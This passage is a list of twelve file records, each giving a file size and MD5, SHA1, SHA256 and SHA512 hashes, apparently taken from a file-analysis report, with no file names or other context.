SHA512 ca826ff5403700e6d8822634e364e43b14ef829095d8fe365b49731236f696fe86ffa3853cd1801dc3b7800d005a032fe23bbc25befe3952ef37790d56dee3c5
-
Filesize
273KB
MD5 21fcb8e3d4310346a5dc1a216e7e23ca
SHA1 aab11aef9075715733e0fcde9668c6a51654b9e1
SHA256 4e27c06b84401039d10f800a0f06446b58508784ee366c7c8324d8fe9794e1a5
SHA512 c064550d1723e92512a42ce367ecef9331a81121305d66199abce6e0977152d927f7223f475e22c67e3f64b0f612c5553f112d8ce653c666a98d1980d200a599
-
Filesize
63KB
MD5 3e540ef568215561590df215801b0f59
SHA1 3b6db31a97115c10c33266cce8ff80463763c7e6
SHA256 52f29aebe9886e830dedc363cd64eb53b6830d84b26e14f1b6faa655a0900b5d
SHA512 21497a4d1d999a420ed0e146544f4149c72ad4aca4b869a0ee83267d92afa07609ece76a4e95ec706a21580d6544146d0a58c0baa01aa2c242474a4816108527
-
Filesize
155KB
MD5 d63e2e743ea103626d33b3c1d882f419
SHA1 af8a162b43f99b943d1c87c9a9e8088816263373
SHA256 48f16b587c6faa44a9e073365b19599200b0f0a0ccb70121e76c2dac4ed53281
SHA512 d3f1450b5def3c21f47c5133073e76d2ec05787eb6ae88bb70d3a34be84f6025540ac017e9415bb22ef36c2ffbfcea38a28842eefe366325f3d3cf2cca1a3cb1
-
Filesize
83KB
MD5 566cb4d39b700c19dbd7175bd4f2b649
SHA1 bede896259b6d52d538c2182aef87c334fc9c73c
SHA256 bced17d6f081d81ea7cd92f1e071e38f8840e61ee0fe1524221b776bcfa78650
SHA512 6a26fd59e2c2ec34b673ef257a00d5577f52286d78525d05efc8a88760fb575be65c3e94e83396f4978c8734b513afe7f09d3c49474169144f98add406530367
-
Filesize
1.3MB
MD5 c8908f8b995911d4fa3d8d5182b68c77
SHA1 33410826118610a65a535701cf6ca548a33e8d4f
SHA256 cd1bd1b1795fa06d01e54be54ce5f12d0c7f8795254e79bbe49f5d071d53d254
SHA512 e0dd014e07fe26e740f14f8be6a4acb30e782207f68d097bb30fb1a8f67dffa3997826184555fb90160be8fa6243741639ef6d14b46256a6dcd449af34db5695
-
Filesize
5.0MB
MD5 ae5b2e9a3410839b31938f24b6fc5cd8
SHA1 9f9a14efc15c904f408a0d364d55a144427e4949
SHA256 ccfffddcd3defb8d899026298af9af43bc186130f8483d77e97c93233d5f27d7
SHA512 36ea760a7b56ea74174882155eddfb8726828240fcfc6b34d90ecdb7e50a7e632374dcbc9b2889081c0973cc51f50967e7d692498c4abd1f2cba3f7fe8d659cc
-
Filesize
38KB
MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978
-
Filesize
5.8MB
MD5 7387fe038ea75eb9a57b054fccfe37bf
SHA1 5c532cbdfd718b5e80afb2ee8dea991e84757712
SHA256 69fd86ea29370697c203f7e12830084f920f490766a8e3045af52c036a9ad529
SHA512 c46c982b04079ed0b13617b81168598632d6c58d29e23fcbfa064b08e5836866b74880e1a9c01c12670531f13521a21177aafb10be0abb329a79291d7bff08bd
-
Filesize
31KB
MD5 715a098175d3ca1c1da2dc5756b31860
SHA1 6b3ec06d679c48bfe4391535a822b58a02d79026
SHA256 6393121130a3e85d0f6562948024d8614c4c144b84ab102af711c638344d1599
SHA512 e92edb98427f594badec592493469d45deab3b71e4598d544d0b9a1acffd5327a19c09029fb79d70971cb0ed0dba56056bef8455534d3f16ec35eac723062f3c
-
Filesize
695KB
MD5 503b3ffa6a5bf45ab34d6d74352f206b
SHA1 cc13b85281e5d52413784e0b65a61b1d037c60cc
SHA256 071494856fdad0042964769aa2fb1de4ea95c2cfcbe27cc7132293c68d13d710
SHA512 d20b860974161caa60a62268968af353ad8063589f57d71f57c91855eb83da78f40bae7aa745cc7a945d92ebe08cf244c9560ae93449de45b20a8b8fff9f5010
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
47B
MD5 36c27a04d9c0cda5d1452f91570d96d8
SHA1 715dcb03713dc380e3e35387ccd2ad9138e6cdbf
SHA256 4a93ff4f6f5c2689e0e299ccd4f1df5e9b5bed90b79b7cf9c3d048d48664b439
SHA512 111c383637e37c865d2f21e829d11b44a723eb131155fcee8cbaadd8b2cffe35c3cb90ac60f6107158518831f1d84f8da166fabe45891b5bbe459f65c31a0235